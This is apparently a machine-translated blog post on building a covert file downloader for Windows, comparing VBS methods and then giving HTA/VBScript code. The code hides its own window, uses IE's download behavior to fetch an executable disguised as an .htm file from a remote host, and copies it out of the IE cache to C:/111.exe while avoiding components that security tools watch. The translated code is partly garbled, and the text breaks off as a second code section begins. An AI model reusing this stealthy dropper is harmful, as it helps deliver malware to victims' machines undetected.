1. دعنا نتحدث أولاً عن اثنين من تنزيل VBS جديد نسبيًا على هذه المدونة. يتم صنع واحد باستخدام مكون cdo.message والآخر مصنوع باستخدام microsoft.xmldom. انظر http://www.jb51.net/article/15506.htm. أحد هذين التنزيلين مزعج للاستخدام ويحتاج إلى تحويل EXE مقدمًا. ثانياً ، سيصل cscript.exe إلى الشبكة أثناء الاستخدام ، وهو أمر غير مخفي للغاية. والثاني هو أن بعض الآلات لا تحتوي على هذين المكونين وتستخدم ADODB.Stream ، لذلك هناك بعض العيوب.
2. دعنا نتحدث عن تنزيل Lake2 http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx. هذا التنزيل جيد جدًا ، ولكن هناك مشاكل. أحدهما أنه إذا تم تثبيت متصفح آخر مثل 360 ، فسيتم فتح نافذة IE ، وقد لا تكون موقع IE Cache قراءة من السجل دقيقة.
3. فكيف نقوم بتحديث هذه العيوب؟ لا يزال هناك طريقة. نستخدم HTA لكتابة هذا ، وهو أمر نادر نسبيا. سيتم إصدار hh.exe بشكل عام عند الوصول إلى الشبكة. كم عدد الصعوبات التي يجب حلها عن طريق كتابة هذا التنزيل:
(1). اجعل HTA غير مسبب ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(2). اجعل سطر أوامر استلام HTA حدود----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(3). لا تسمي جميع المكونات المذكورة في العناصر الأولى والثانية فوق----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(4) الموقع المؤقت لـ .ie cache --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(5) لا نسمي أي عنصر------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4. الكود (اكتب مباشرة المعلمات في HTA)
الرمز كما يلي:
<لغة البرنامج النصي = vbs>
Window.Moveto 4000،4000
Window.Resizeto 0،0 'اجعل HTA غير مرئي
set objshell = createObject ("wscript.shell") "يمكن لـ HTA الاتصال مباشرة بـ wscript.shell ، ولكن لا يمكن الاتصال بـ wscript.createBject (" wscript.shell ")
DownPath = objshell.expandenvironmentstrings ("٪ userprofile ٪") و "/الإعدادات المحلية" احصل على مسار التنزيل وفقًا لمتغير البيئة
SET XML = document.createElement ("XML") "السلوك الافتراضي لإنشاء مكالمة عنصر XML IE
xml.addbehavior ("#Default#Download")
xml.async = 0
xml.load ("http://192.168.0.10/xx.htm") "يرجى تغيير اسم exe إلى المساحة. إذا قمت بتحميله باستخدام برنامج FTP ، فقد لا يعمل. من الأفضل وضعه على.
Showallfile (أسفل)
Sub ShowAllfile (Path) "السفر والبحث ، استخدم رمز LAKE2 مباشرة
FindFilename = "XX [1] .htm" 'هذا أيضًا ما تحتاج إلى تغييره. إذا كان ما سبق هو xx.htm ، فهناك xx [1] .htm
set fso = createObject ("scripting.filesystemObject")
تعيين f = fso.getfolder (المسار)
تعيين fc = f.subfolders
لكل F1 في FC
إذا كان fso.filexists (path & "/" & f1.name & "/" & findFilename) ثم
مسار fso.copyfile و "/" & f1.name & "/" & findFilename ، "C: /111.exe" "حفظ إلى C: /111.exe ، ويمكن تغييره حسب الحاجة
'document.write "[+] قم بتنزيل النجاح!"
إنهاء إذا
مسار ShowAllfile و "/" & f1.name
التالي
تعيين fso = لا شيء
نهاية الفرعية
window.close
</script>
الاستخدام هو: ضع exe مثل xx.exe على المساحة ، ثم انقر نقرًا مزدوجًا على هذا HTA.
5. رمز آخر (معلمات سطر الأوامر مرور)
أنا شخصياً أعتقد أن الكود في الجزء الرابع أفضل ، فقط قم بتعديله واستخدامه. إذا تم استدعاء معلمات سطر الأوامر ، فقد وجدت أن نافذة HTA ستظل تظهر وستغلق فقط بعد التنزيل ، لذلك هذا ليس جيدًا. شفرة: